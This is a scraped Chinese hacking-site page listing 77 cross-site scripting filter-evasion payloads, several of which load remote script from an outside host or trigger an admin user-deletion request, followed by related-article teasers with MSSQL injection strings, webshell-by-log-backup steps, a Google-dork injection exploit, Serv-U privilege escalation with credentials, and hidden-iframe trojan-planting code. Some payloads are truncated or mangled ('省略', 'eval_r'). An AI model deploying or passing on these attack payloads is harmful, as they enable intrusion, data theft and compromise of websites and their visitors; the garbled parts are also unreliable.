Xss宽展教程攻击详列 -中国寒龙网出品 欢迎关注

1)普通的XSS JavaScript注入
<SCRIPT
SRC=http://3w.org/XSS/xss.js></SCRIPT>

(2)IMG标签XSS使用JavaScript命令
<SCRIPT
SRC=http://3w.org/XSS/xss.js></SCRIPT>

(3)IMG标签无分号无引号
<IMG
SRC=javascript:alert(‘XSS’)>

(4)IMG标签大小写不敏感
<IMG
SRC=JaVaScRiPt:alert(‘XSS’)>

(5)HTML编码(必须有分号)
<IMG
SRC=javascript:alert(“XSS”)>

(6)修正缺陷IMG标签
<IMG
“”"><SCRIPT>alert(“XSS”)</SCRIPT>”>

(7)formCharCode标签(计算器)
<IMG
SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8)UTF-8的Unicode编码(计算器)
<IMG
SRC=jav..省略..S‘)>

(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
<IMG
SRC=jav..省略..S‘)>

(10)十六进制编码也是没有分号(计算器)
<IMG
SRC=&#x6A&#x61&#x76&#x61..省略..&#x58&#x53&#x53&#x27&#x29>

(11)嵌入式标签,将Javascript分开
<IMG
SRC=”jav ascript:alert(‘XSS’);”>

(12)嵌入式编码标签,将Javascript分开
<IMG
SRC=”jav ascript:alert(‘XSS’);”>

(13)嵌入式换行符
<IMG SRC=”jav
ascript:alert(‘XSS’);”>

(14)嵌入式回车
<IMG SRC=”jav
ascript:alert(‘XSS’);”>

(15)嵌入式多行注入JavaScript,这是XSS极端的例子
<IMG
SRC=”javascript:alert(‘XSS‘)”>

(16)解决限制字符(要求同页面)
<script>z=’document.’</script>
<
script>z=z+’write(“‘</script>
<
script>z=z+’<script’</script>
< script>z=z+’
src=ht’</script>
< script>z=z+’tp://ww’</script>
<
script>z=z+’w.shell’</script>
<
script>z=z+’.net/1.’</script>
<
script>z=z+’js></sc’</script>
<
script>z=z+’ript>”)’</script>
<
script>eval_r(z)</script>

(17)空字符
perl -e ‘print “<IMG
SRC=java\0script:alert(\”XSS\”)>”;’ >
out

(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
perl -e ‘print
“<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ >
out

(19)Spaces和meta前的IMG标签
<IMG SRC=”
javascript:alert(‘XSS’);”>

(20)Non-alpha-non-digit XSS
<
SCRIPT/XSS
SRC=”http://3w.org/XSS/xss.js”></SCRIPT>

(21)Non-alpha-non-digit
XSS to 2
< BODY
onload!#$%&()*~+-_.,:;[email protected][/|\]^`=alert(“XSS”)>

(22)Non-alpha-non-digit
XSS to 3
<
SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>

(23)双开括号
<<SCRIPT>alert(“XSS”);//<</SCRIPT>

(24)无结束脚本标记(仅火狐等浏览器)
<SCRIPT
SRC=http://3w.org/XSS/xss.js?<B>

(25)无结束脚本标记2
< SCRIPT
SRC=//3w.org/XSS/xss.js>

(26)半开的HTML/JavaScript XSS
< IMG
SRC=”javascript:alert(‘XSS’)”

(27)双开角括号
<iframe
src=http://3w.org/XSS.html <

(28)无单引号 双引号
分号
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29)换码过滤的JavaScript
\”;alert(‘XSS’);//

(30)结束Title标签
<
/TITLE><SCRIPT>alert(“XSS”);</SCRIPT>

(31)Input
Image
< INPUT SRC=”javascript:alert(‘XSS’);”>

(32)BODY
Image
< BODY
BACKGROUND=”javascript:alert(‘XSS’)”>

(33)BODY标签
<BODY(‘XSS’)>

(34)IMG
Dynsrc
< IMG DYNSRC=”javascript:alert(‘XSS’)”>

(35)IMG
Lowsrc
< IMG
LOWSRC=”javascript:alert(‘XSS’)”>

(36)BGSOUND
< BGSOUND
SRC=”javascript:alert(‘XSS’);”>

(37)STYLE sheet
< LINK
REL=”stylesheet”
HREF=”javascript:alert(‘XSS’);”>

(38)远程样式表
<LINK
REL=”stylesheet”
HREF=”http://3w.org/xss.css”>

(39)List-style-image(列表式)
<STYLE>li
{list-style-image:
url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS

(40)IMG
VBscript
< IMG
SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS

(41)META链接url
< META HTTP-EQUIV=”refresh” CONTENT=”0;
URL=http://;URL=javascript:alert(‘XSS’);”>

(42)Iframe
< IFRAME
SRC=”javascript:alert(‘XSS’);”></IFRAME>

(43)Frame
< FRAMESET><FRAME
SRC=”javascript:alert(‘XSS’);”></FRAMESET>

(44)Table
<
TABLE BACKGROUND=”javascript:alert(‘XSS’)”>

(45)TD
<
TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>

(46)DIV
background-image
< DIV STYLE=”background-image:
url(javascript:alert(‘XSS’))”>

(47)DIV
background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
<
DIV STYLE=”background-image: url( javascript:alert(‘XSS’))”>

(48)DIV
expression
< DIV STYLE=”width:
expression_r(alert(‘XSS’));”>

(49)STYLE属性分拆表达
<IMG
STYLE=”xss:expression_r(alert(‘XSS’))”>

(50)匿名STYLE(组成:开角号和一个字母开头)
<XSS
STYLE=”xss:expression_r(alert(‘XSS’))”>

(51)STYLE
background-image
<
STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A
class="XSS"></A>

(52)IMG
STYLE方式
exppression(alert(“XSS”))’>

(53)STYLE background
<
STYLE><STYLE
type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>

(54)BASE
<
BASE
HREF=”javascript:alert(‘XSS’);//”>

(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
<
EMBED SRC=”http://3w.org/XSS/xss.swf”
></EMBED>

(56)在flash中使用ActionScrpt可以混进你XSS的代码
a=”get”;
b=”URL(\”";
c=”javascript:”;
d=”alert(‘XSS’);\”)”;
eval_r(a+b+c+d);

(57)XML
namespace.HTC文件必须和你的XSS载体在一台服务器上
<HTML xmlns:xss>
< ?import
namespace=”xss”
implementation=”http://3w.org/XSS/xss.htc”>
<xss:xss>XSS</xss:xss>
<
/HTML>

(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
<SCRIPT
SRC=””></SCRIPT>

(59)IMG嵌入式命令,可执行任意命令
<IMG
SRC=”http://www.XXX.com/a.php?a=b”>

(60)IMG嵌入式命令(a.jpg在同服务器)
Redirect
302 /a.jpg
http://www.XXX.com/admin.asp&deleteuser

(61)绕符号过滤
<SCRIPT
a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>

(62)
<
SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>

(63)
<
SCRIPT a=”>” ”
SRC=”http://3w.org/xss.js”></SCRIPT>

(64)
< SCRIPT
“a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>

(65)
<
SCRIPT a=`>`
SRC=”http://3w.org/xss.js”></SCRIPT>

(66)
< SCRIPT
a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>

(67)
<
SCRIPT>document.write(“<SCRI”);</SCRIPT>PT
SRC=”http://3w.org/xss.js”></SCRIPT>

(68)URL绕行
<A
HREF=”http://127.0.0.1/”>XSS</A>

(69)URL编码
<A
HREF=”http://3w.org”>XSS</A>

(70)IP十进制
<A
HREF=”http://3232235521″>XSS</A>

(71)IP十六进制
<A
HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>

(72)IP八进制
<A
HREF=”http://0300.0250.0000.0001″>XSS</A>

(73)混合编码
<A
HREF=”h
tt p://6
6.000146.0×7.147/”">XSS</A>

(74)节省[http:]
< A
HREF=”//www.google.com/”>XSS</A>

(75)节省[www]
< A
HREF=”http://google.com/”>XSS</A>

(76)绝对点绝对DNS
< A
HREF=”http://www.google.com./”>XSS</A>

(77)javascript链接
<A
HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>

时间: 2024-10-09 01:02:13

Xss宽展教程攻击详列 -中国寒龙网出品 欢迎关注的相关文章

mssql2005存手工注入漏洞附攻击方法- 寒龙网出品

/**/跟空格的作用一样,有的时候可以过一些过滤爆库语句,修改红色部分的数字挨个猜出库 /**/and/**/(select/**/top/**/1/**/isnull(cast([name]/**/as/**/nvarchar(500)),char(32))%2bchar(124)/**/from/**/[master].[dbo].[sysdatabases]/**/where/**/dbid/**/in/**/(select/**/top/**/1/**/dbid/**/from/**/[

DBO权限日志备份专用一句话木马 - 寒龙网出品 以前的博客站因为程序错乱改为反病毒联盟后 本博客基于博客园地 感谢关注

备分专用一句话 加个response.end会有不一样的效果,也就是插入一句话后所有的代码都无效,在一句话这里打止,也就减小了webshell的大小. 日志备分WEBSHELL标准的七步: 1.InjectionURL';alter database XXX set RECOVERY FULL-- (把sql设置成日志完全恢复模式) 2.InjectionURL';create table cmd (a image)-- (新建立一个cmd表) 3.InjectionURL';backup lo

[中国寒龙联盟出品]C语言基础知识视频教程第一课-C语言简史,特点,基本结构,函数printf()和scanf()使用和c语言的开发过程。

本视频由中国寒龙收集整理发布,更多请关注我们的博客和,我们的官网:www.hackerschina.org  感谢朋友们的支持!

MITMf:中间人攻击框架 -由中国寒龙整理收集

MITMf:中间人攻击框架 MITMF是一个可用于中间人攻击的框架.这个框架是基于Python的,它拥有数个插件,增加了更多的渗透测试方面的功能.一些实用的插件: jskeylogger – 这个插件可以在目标机器上注入一个 javascript 键盘记录器 JavaPwn – 在客户端利用过时的Java浏览器插件,配合使用Metasploit 安装假的Java更新 FilePwn – 这个插件使用后门工厂掩饰可执行文件,以及通过http发送zip文件 Spoof – 使用ARP欺骗,DNS欺骗

0DAY漏洞之谷歌搜索 -中国寒龙网病毒联盟

这里公布一个关于aspx网站程序的oday方法很简单.直接爆出管理密码. 也是利用注入漏洞. 利用代码 谷歌搜索关键字:inurl:scoreindex.aspx cart.aspx?act=buy&id=1 and (SelectTop1char(124)%2BisNull(cast([Name] as varchar(8000)),char(32))%2Bchar(124)%2BisNull(cast([Pass] as varchar(8000)),char(32))%2Bchar(124

serv-u端口转发提权 -寒龙网出品

1.在服务器上cmd 执行: lcx -slave 我的IP 5000 127.0.0.1 43958(有可能被改) 2. 在本机运行 lcx -listen 5000 21 (lcx地址要写对) 3. 打开本地的serv u 在IP上填入127.0.0.1 帐号:LocalAdministrator 密码:#[email protected]$ak#.lk;[email protected] (密码帐号有可能改 自己下文件看密码) 此时的链接过程是本机连接21端口----转发往本机5000端口

ASP代码添加超级用户 -寒龙网出品

在user权限下成功添加Administrators组的用户反正代码是对的,但是很少能成功,具体的看运气了.. <head>.network对象脚本权限提升漏洞利用工具</head><form action="useradd.asp" method=post>用户:<input name="username" type="text" value="kevin1986"><b

利用谷歌实现批量入侵的方法 -中国寒龙

route print 查看本机设置网络 intext:这个就是把网页中的正文内容中的某个字符做为搜索条件.例如在google里输入:intext:动网.将返回所有在网页正文部分包含"动网"的网页.allintext:使用方法和intext类似. intitle: 和上面那个intext差不多,搜索网页标题中是否有我们所要找的字符.例如搜索:intitle:安全天使.将返回所有网页标题中包含"安全天使"的网页.同理allintitle:也同intitle类似. ca

网页挂马大全集 -中国寒龙出品 转载写明出处www.hackerschina.org

一:框架挂马<iframe src=地址 width=0 height=0></iframe>二:js文件挂马首先将以下代码document.write("<iframe width='0' height='0' src='地址'></iframe>");保存为xxx.js,则JS挂马代码为<script language=javascript src=xxx.js></script>三:js变形加密<SCR